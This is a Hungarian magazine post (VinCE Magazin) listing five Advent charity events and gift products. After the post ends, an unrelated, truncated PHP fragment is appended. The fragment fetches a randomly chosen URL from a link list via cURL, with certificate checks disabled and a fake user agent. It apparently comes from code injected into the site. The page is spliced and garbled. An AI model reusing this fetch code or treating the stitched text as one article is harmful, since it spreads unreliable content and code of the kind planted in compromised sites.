Adni jó

Már csak egy hét és kezdődik az Advent, a karácsonyi készülődés időszaka, amikor szívesen sürgünk-forgunk a konyhában és azon gondolkodunk, milyen ajándékokkal okozhatnánk örömet szeretteinknek. Azonban vannak, akiknek egész más problémákkal kell szembenézniük – nem szabad megfeledkeznünk róluk. Összegyűjtöttünk öt jótékonysági eseményt, amelyek alkalmával bárki segíthet a rászorulókon, miközben kellemesen tölti idejét. Fotó: Pinterest III.... View Article


Már csak egy hét és kezdődik az Advent, a karácsonyi készülődés időszaka, amikor szívesen sürgünk-forgunk a konyhában és azon gondolkodunk, milyen ajándékokkal okozhatnánk örömet szeretteinknek. Azonban vannak, akiknek egész más problémákkal kell szembenézniük – nem szabad megfeledkeznünk róluk. Összegyűjtöttünk öt jótékonysági eseményt, amelyek alkalmával bárki segíthet a rászorulókon, miközben kellemesen tölti idejét.

Fotó: Pinterest

III. Művészek a Heti Betevőért kiállítás és művészeti aukció

Idén harmadik alkalommal rendezik meg a Művészek a Heti Betevőért jótékonysági aukciót és kiállítást kortárs művészek és önkéntesek közreműködésével. Több mint 40 alkotó ajánlotta fel munkáját és az online licitből származó bevétel összegét, melyet teljes egészében a rászorulók támogatására fordítanak a szervezők. A kiállítás november 26-ig megtekinthető Kahan Art Space Gallery-ben.

Facebook

5. Jótékonysági forraltbor-főző verseny

Zebegényben mindenkit szeretettel várnak december 1-én a 17 órakor kezdődő jótékonysági forraltbor-főző versenyen. A csapatok november 29-éig nevezhetnek, saját felszereléssel és egyedi recepttel.

Facebook

Családszervezetek III. Adventi Jótékonysági Vására

December 1-én, a Millenáris Park B épületében kézműves jótékonysági vásárt rendeznek a családvédő szervezetek, és a befolyt összeggel idén a siket és nagyothalló gyermekkel, szülővel élő családokat támogatják.

Facebook

Jótékonysági forralt borozás Móron

December 2-án 15 órától a móri pincék forralt borral töltik meg mindenki poharát, aki egy cipős doboznyi ajándékkal érkezik a Mór szívében található Lábasház udvarába. A gyerekeket is érdemes magunkkal hozni, hiszen a Mikulás is tiszteletét teszi a rendezvényen!

Facebook

Borok és különleges csokoládésdoboz az Autistic Artstól

Aki még keresi a tökéletes karácsonyi vagy Mikulás-ajándékot, annak megkönnyíti a dolgát az Autistic Arts Alapítvány, akik csokoládéval készültek az ünnepekre. Minden terméket egy-egy autizmussal élő fiatal rajza díszíti, és a bevételt a lakóotthonok fenntartására fordítják. Az alapítványnak borkollekciója is van neves pincészetekkel együttműködésben, amely szintén elérhető a webshopjukban.

Facebook

(Visited 2 times, 2 visits today)

The post Adni jó appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>